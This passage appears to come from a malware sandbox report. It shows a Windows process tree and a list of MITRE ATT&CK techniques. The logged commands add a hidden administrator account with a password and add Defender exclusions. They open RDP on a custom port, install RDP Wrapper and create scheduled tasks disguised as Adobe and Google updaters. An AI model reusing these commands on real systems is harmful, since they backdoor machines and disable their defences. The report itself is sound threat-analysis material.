  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
      Uno.exe.com f
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3952
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1816
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Drops Chrome extension
        Suspicious behavior: EnumeratesProcesses
        
        PID:2260
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      System Location Discovery: System Language Discovery
      PID:2824
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
      Inebriato.exe.com R
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4224
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3648
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:312
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3940
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2488
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\1163.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\952.vbs
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2144
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\1163.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\952.vbs
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:32
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\13.vbs" gTAismccBy bWmFOhvXed "C:\Users\Admin\AppData\Roaming\jVFBF\547.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\LzLHkxNG.bat" "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4036
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\13.vbs" gTAismccBy bWmFOhvXed "C:\Users\Admin\AppData\Roaming\jVFBF\547.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\LzLHkxNG.bat" "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll"
        8⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll" /tn "Adobe Flash Player Updater9"
        7⤵
        
        PID:2032
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll" /tn "Adobe Flash Player Updater9"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3412
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\309.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\952.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3648
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\309.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\952.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll"
        8⤵
        
        PID:1948
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll" /tn "MySQLNotifierTask44"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2824
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll" /tn "MySQLNotifierTask44"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\jVFBF\iDtJpgzIuN.bat gTAismccBy bWmFOhvXed"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2380
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4224
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4408
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
        
        C:\Windows\SysWOW64\net.exe
        
        net user gTAismccBy bWmFOhvXed /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1712
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user gTAismccBy bWmFOhvXed /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3720
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators gTAismccBy /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4256
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators gTAismccBy /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2152
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" gTAismccBy /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:4848
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" gTAismccBy /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1552
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2368
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        9⤵
        
        PID:4560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v gTAismccBy /t REG_DWORD /d "00000000" /f
        8⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:3228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2456
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2880
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4328
        
        C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
        7⤵
        Drops file in Program Files directory
        
        PID:4216
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2032
        
        C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:744
        
        C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3400
        
        C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:440
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1948
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:3388
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        
        PID:1032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        8⤵
        
        PID:4420
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2408
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:912
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:4752
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        
        PID:4732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1336
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        8⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3492
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1788
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
        8⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        9⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:3344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        
        PID:4420
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4820
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:8
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\113.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\792.vbs" "VVROa2ExQlhaRlZSVjJ4NllsZE9hbEZ1YTIxUk1VWkNVV294YVZZeU1VZFVNbWd5VjBkV2EwcHJNVmRoTWxwVFpHNUZPV1Y2ClpFTk5SRVY2VGxWV1JFeFZXa1JQUkZsMENrNUZTWGROZVRGQ1QwVldSRXhVU2taUFZGSkNVVlJvUTAxRVpFZFNTREE5" "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1872
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\113.vbs" "C:\Users\Admin\AppData\Roaming\jVFBF\792.vbs" "VVROa2ExQlhaRlZSVjJ4NllsZE9hbEZ1YTIxUk1VWkNVV294YVZZeU1VZFVNbWd5VjBkV2EwcHJNVmRoTWxwVFpHNUZPV1Y2ClpFTk5SRVY2VGxWV1JFeFZXa1JQUkZsMENrNUZTWGROZVRGQ1QwVldSRXhVU2taUFZGSkNVVlJvUTAxRVpFZFNTREE5" "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll" /tn "GoogleUpdateTaskMachineCore92"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:448
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\jVFBF\AEU.dll" /tn "GoogleUpdateTaskMachineCore92"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1788
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:5012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:3396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:848

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\jVFBF\547.vbs" gTAismccBy bWmFOhvXed "C:\Users\Admin\AppData\Roaming\jVFBF\LzLHkxNG.bat"
1⤵
- Checks computer location settings
PID:3676
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\jVFBF\LzLHkxNG.bat
  2⤵
  - Drops file in System32 directory
  PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    3⤵
    PID:2704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-544" get name /value
      4⤵
      PID:3824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    3⤵
    PID:4908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-555" get name /value
      4⤵
      PID:4892
- - C:\Windows\system32\net.exe
    net user gTAismccBy bWmFOhvXed /add
    3⤵
    PID:4320
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user gTAismccBy bWmFOhvXed /add
      4⤵
      PID:224
- - C:\Windows\system32\net.exe
    net localgroup Administrators gTAismccBy /add
    3⤵
    PID:3372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators gTAismccBy /add
      4⤵
      PID:316
- - C:\Windows\system32\net.exe
    net localgroup Remote Desktop Users gTAismccBy /add
    3⤵
    PID:1144
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users gTAismccBy /add
      4⤵
      PID:64
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:3904
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:1556
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v gTAismccBy /t REG_DWORD /d "00000000" /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:4116
- - C:\Windows\system32\reg.exe
    reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    3⤵
    PID:1944
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1072
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2568
- - C:\Windows\system32\timeout.exe
    Timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:1480

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

